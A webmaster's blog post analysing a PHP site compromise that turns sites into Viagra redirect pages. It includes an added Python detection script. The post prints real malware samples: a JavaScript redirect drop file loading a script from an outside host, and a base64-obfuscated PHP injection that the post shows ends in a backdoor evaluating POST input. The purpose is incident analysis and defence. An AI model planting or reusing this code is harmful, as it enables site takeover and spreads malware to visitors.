The “Comber 38” Viagra Hack

Just when I thought the Drunkjeans Hack had passed over, there’s another attack on a couple of my sites. I’ll call it the “Comber 38” hack. These hacks are most likely related.

What does this hack do?

With Comber 38, your sites are turned into Viagra Promo sites. Search for “viagra hack” and you’ll see how common this problem is.

Even though your home page may still work, the hackers use your site as storage for images that can be pulled in from other sites, hence poncing off your server’s bandwidth.

If these files are linked to, your site redirects to some viagra site. It gives the hackers and spammers a direct link to a clean site rather than having to use their spam domains directly. If it weren’t so evil, you could argue it’s a pretty bright idea…

In fact, here’s what’s in one of those files:

<html>
<head>
<script>
location = 'http://cheapviagrarx.com/';
</script>
</head>
</html>
<script src=http://pkd.home.pl/regietow/button_krakow.php >
</script>

Apart from that, I’ve also discovered the following code at the top of my index.php file:

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnczRzJykpe2Z1bmN0aW9uIHM0cygkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzQnJaQzVvYjIxbExuQnNMM0psWjJsbGRHOTNMMkoxZEhSdmJsOXJjbUZyYjNjdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBzNHMyKCRhLCRiLCRjLCRkKXtnbG9iYWwkczRzMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkczRzMSkpY2FsbF91c2VyX2Z1bmMoJHM0czEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3M0cycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3M0cycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRzNHNsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdzNHMyJykpIT0nczRzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

I removed it – but after a few hours it was back as this:

<?php eval(base64_decode('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')); ?>

After a while Google will flag infected sites as “not safe” and StopBadware.org will pass this data on to Firefox, which in turn will block your site from being viewed.

Your hosting company may close down your site until you remove the threat.

What can we do about this, Cap’n?

At the moment, I assume that deleting the files will clear up the problem. Once that’s done, all we can hope for is that attacks will stay away until we can determine which security exploit (probably in Apache) has to be fixed. This is getting ridiculous!

If your site has been reported as “not safe”, you can help matters by requesting a review here and let StopBadware.org know that your site is no longer used for malicious activities.

Hack Variations

I’ve seen the following variations of these files. Please check your sites carefully if you see any of these or similar files (in which case, please leave a comment):

comber38.html / comber38.jpg
veld27.html/ veld27.jpg
spooky98.html / spooky98.jpg
hobnob59.html / hobnob59.jpg
whoosh80.html / whoosh80.jpg
flight34.html / flight34.jpg
tiara30.html / tiara30.jpg
vista46.html / vista46.jpg
botch11.html / botch11.jpg
fetid47.html / fedif47.jpg
sullen50.html / sullen50.jpg
plea30.html / plea30.jpg
load38.html (interestingly without a .jpg variant)
craggy37.html / craggy 36.jpg
oxeye36.html
cradle60.html
sacred57.html
jacket78.html
orrery12.html
royal13.html
zigzag74.html
chance41.html
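As an added example (not the author's code), here is a small Python scanner for the three indicators this post describes, run over constructed sample files rather than the real site: the eval(base64_decode()) line at the top of index.php, the JavaScript redirect inside the drop files, and the word-plus-two-digits file names listed above. The sample file contents, the example.invalid domain and the rule names are assumptions made for the demonstration.

```python
import base64
import re

# Constructed sample files modelled on the post's description; not the author's real files.
SAMPLE_FILES = {
    "index.php": "<?php eval(base64_decode('"
        + base64.b64encode(b"if(!function_exists('s4s')){eval(base64_decode($_POST['e']));}").decode()
        + "')); ?>\n<?php\n// legitimate front controller follows\n",
    "comber38.html": "<html><head><script>\nlocation = 'http://example.invalid/';\n"
        "</script></head></html>\n",
    "about.html": "<html><body><p>Hello</p></body></html>\n",
    "wp-config.php": "<?php define('DB_NAME', 'wp');\n",
}

# eval(base64_decode('...')) with the literal captured, regardless of spacing or quote style
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)
# bare JavaScript redirect, as in the drop files the post quotes
JS_REDIRECT = re.compile(r"\blocation\s*=\s*['\"]https?://", re.I)
# word + two digits + .html/.jpg, the naming scheme of every variation listed
DROP_NAME = re.compile(r"^[a-z]+\d{2}\.(html|jpg)$")


def decode_payload(b64):
    """Decode (never eval) the obfuscated layer so an analyst can read it."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except ValueError:
        return None


def scan_file(name, content):
    findings = []
    m = EVAL_B64.search(content)
    if m:
        findings.append("eval(base64_decode()) injection")
        decoded = decode_payload(m.group(1)) or ""
        # a payload that feeds request data to eval is a remote backdoor, not just a redirect
        if re.search(r"\$_(POST|GET|REQUEST|COOKIE)\b", decoded):
            findings.append("decoded payload evaluates request input (backdoor)")
    if JS_REDIRECT.search(content):
        findings.append("javascript redirect to external site")
    if DROP_NAME.match(name):
        findings.append("filename matches word+2digit drop-file pattern")
    return findings


def scan_site(files):
    # filename -> findings, for every file that triggers at least one rule
    report = {}
    for name, content in files.items():
        hits = scan_file(name, content)
        if hits:
            report[name] = hits
    return report
```

Decoding the blob quoted earlier in the post the same way shows a PHP function that registers itself with ob_start('s4s') to rewrite every page's output and ends with eval(base64_decode($_POST['e'])), so the injection is a remote code-execution backdoor as well as a redirect, which is why it reappears after the files are deleted.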

Conclusion

These are troubling times, my friends! Please contribute below if your site has been compromised, and especially if you know how we can all prevent this from happening in the future.

Thanks 🙁





Jay is the CEO and founder of WP Hosting, a boutique style managed WordPress hosting and support service. He has been working with Plesk since version 9 and is a qualified Parallels Automation Professional. In his spare time he likes to develop iOS apps and WordPress plugins, or draw on tablet devices. He blogs about his coding journey at http://wpguru.co.uk and http://pinkstone.co.uk.